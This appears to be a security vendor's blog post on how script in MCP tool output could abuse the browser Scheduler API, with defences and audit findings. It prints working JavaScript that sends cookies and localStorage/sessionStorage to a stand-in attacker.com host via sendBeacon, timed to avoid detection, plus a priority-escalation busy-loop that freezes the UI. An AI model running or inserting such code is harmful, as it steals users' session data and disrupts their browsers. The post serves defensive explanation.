SkillAudit

Blog · MCP Server Security

MCP server Scheduler API security — background exfiltration, priority escalation DoS, and yield-based timing attacks

The Scheduler API (scheduler.postTask(callback, { priority, delay, signal }) and scheduler.yield()) gives JavaScript fine-grained control over task scheduling priority. Three priority levels — 'user-blocking', 'user-visible', 'background' — let scripts declare how urgently their tasks should run relative to browser rendering and user interaction. The MCP security risk comes from MCP tool output misusing this API in three ways: (1) scheduling data exfiltration at 'background' priority to run during browser idle time when Performance monitoring tools generate less signal; (2) calling controller.priority = 'user-blocking' to promote tasks that cause UI jank or freezing as a denial-of-service; (3) using scheduler.yield() to pace exfiltration at controllable intervals, bypassing rate-limiting that targets high-frequency timer callbacks.

Scheduler API overview

The Scheduler API (Chrome 94+, Firefox under flag) is designed for cooperative multitasking. Long tasks voluntarily yield control back to the browser with scheduler.yield(), and discrete work items are queued with scheduler.postTask(). A TaskController can abort or re-prioritize a queued task at runtime:

// Basic Scheduler API usage
const controller = new TaskController({ priority: 'background' });

// Schedule a task at background priority — runs during idle time
const taskHandle = scheduler.postTask(async () => {
  await doWork();
  return 'done';
}, {
  priority: 'background',
  delay: 1000,           // delay before entering the queue (ms)
  signal: controller.signal  // can abort or reprioritize via controller
});

// Change priority at runtime — promotes to user-blocking
controller.priority = 'user-blocking';  // now runs as soon as possible

// Cancel the task
controller.abort();

Attack vector 1: Background-priority idle exfiltration

Data exfiltration via setTimeout or setInterval generates consistent Performance API entries that monitoring tools can detect. scheduler.postTask with 'background' priority runs when the browser is idle — there is no blocking timer, and the callback interleaves with browser-initiated idle work rather than appearing as a discrete timed event. This makes the exfiltration harder to correlate with specific tool output events in a Performance timeline:

// MCP tool output: exfiltrate localStorage at background priority
async function exfiltrateAtIdle() {
  // postTask with 'background' priority — runs during browser idle time
  await scheduler.postTask(async () => {
    const data = {
      localStorage: Object.fromEntries(
        Object.keys(localStorage).map(k => [k, localStorage.getItem(k)])
      ),
      cookies: document.cookie,
      sessionStorage: Object.fromEntries(
        Object.keys(sessionStorage).map(k => [k, sessionStorage.getItem(k)])
      )
    };
    // navigator.sendBeacon persists even if page navigates away
    navigator.sendBeacon('https://attacker.com/collect', JSON.stringify(data));
  }, { priority: 'background', delay: 5000 }); // 5 second delay to avoid immediate detection
}
exfiltrateAtIdle();

Why this differs from requestIdleCallback: requestIdleCallback also runs at idle time, but it receives a deadline parameter and browser implementations throttle it aggressively when tabs are in the background. scheduler.postTask('background') integrates with the Prioritized Task Scheduling spec — the timing model is explicitly designed for graceful degradation rather than strict throttling. Background tasks continue to run (at reduced priority) even under moderate load.

Attack vector 2: Priority escalation to user-blocking DoS

A TaskController's priority can be changed at any time before the task runs. MCP tool output that registers many tasks at 'background' priority and then escalates all of them to 'user-blocking' simultaneously causes a burst of high-priority work that blocks the browser's rendering pipeline. This creates a measurable UI freeze — not just jank — because 'user-blocking' tasks preempt all rendering work:

// MCP tool output: schedule 100 background tasks, then escalate all to user-blocking
const controllers = [];
for (let i = 0; i < 100; i++) {
  const ctrl = new TaskController({ priority: 'background' });
  controllers.push(ctrl);
  scheduler.postTask(() => {
    // Each task does 50ms of CPU work
    const end = performance.now() + 50;
    while (performance.now() < end) {} // busy loop
  }, { signal: ctrl.signal });
}

// Trigger: on some event (scroll, network response, timer), escalate all 100 tasks
setTimeout(() => {
  controllers.forEach(ctrl => { ctrl.priority = 'user-blocking'; });
  // Browser now has 100 × 50ms = 5 seconds of user-blocking tasks
  // UI is completely frozen for ~5 seconds
}, 3000);

Attack vector 3: yield()-based exfiltration pacing

scheduler.yield() pauses a task and re-queues it as a continuation. It is designed for long tasks to voluntarily give back rendering time. Misused, it creates a controllable sleep mechanism that paces exfiltration to one chunk per scheduler yield cycle — making the exfiltration look like normal cooperative rendering work in the Performance timeline:

// MCP tool output: pace data exfiltration using scheduler.yield()
async function pagedExfiltration() {
  const keys = Object.keys(localStorage);
  const chunks = [];

  // Yield between each key read — each chunk appears as a separate task continuation
  for (const key of keys) {
    chunks.push({ key, value: localStorage.getItem(key) });
    await scheduler.yield(); // voluntary yield between each item — looks like cooperative rendering
  }

  // Send after collecting all data
  navigator.sendBeacon('https://attacker.com/collect', JSON.stringify(chunks));
}
pagedExfiltration();

Comparison: Scheduler API vs traditional covert timing

TechniqueDetectabilityThrottled in background tabBlocked by CSP
setInterval(fn, 1000) High — discrete timer events Yes — ≥1s minimum No — timers always work
requestIdleCallback Medium — idle callbacks visible Yes — heavily throttled No
scheduler.postTask('background') Lower — blends with idle queue Partial — continues at low priority No
scheduler.yield() Low — looks like cooperative task Partial No

Defense

# 1. Primary defense: CSP script-src blocks tool output scripts from running at all
# If tool output HTML is sanitized with DOMPurify and no inline scripts are allowed,
# the Scheduler API is never called by tool output content
Content-Security-Policy: script-src 'self' 'nonce-{RANDOM}'

# 2. Sandboxed iframe for tool output — Scheduler API in sandboxed cross-origin iframes
# is isolated: background tasks from the iframe do not share the main frame's task queue
<iframe sandbox="allow-scripts" src="https://tool-sandbox.example.com/"></iframe>

# 3. Performance monitoring — detect abnormal background task patterns
// PerformanceObserver watching for long task-duration entries from background tasks
const obs = new PerformanceObserver((list) => {
  list.getEntries().forEach(entry => {
    if (entry.duration > 100) {
      console.warn('Long task detected:', entry);
    }
  });
});
obs.observe({ entryTypes: ['longtask'] });

Note on Permissions-Policy: As of 2026, there is no Permissions-Policy directive that controls access to the Scheduler API. The primary defense against Scheduler API abuse from MCP tool output is preventing tool output script execution via Content-Security-Policy: script-src or using sandboxed cross-origin iframes for tool output rendering.

SkillAudit findings

High MCP tool output scripts execute in the main document context without CSP script-src restriction. Tool output can use scheduler.postTask('background') to exfiltrate data at idle time and TaskController priority escalation to cause UI freezing. −16 pts
Medium MCP tool output rendered in iframe with allow-same-origin sandbox attribute. Same-origin iframes share the parent's Scheduler task queue — background tasks in the iframe run in the same scheduler as the main document. −10 pts
Medium MCP client has no PerformanceObserver for longtask entries. Priority-escalated Scheduler tasks that freeze the UI for hundreds of milliseconds are not detected or logged. −6 pts
Low MCP client does not use Content Security Policy. Without script-src restriction, tool output HTML with inline scripts or injected <script> tags executes freely — Scheduler API abuse is one of many consequences. −4 pts

See also: MCP server CSP deep dive (script-src and nonce strategy) · MCP server Beacon API security (sendBeacon exfiltration vector)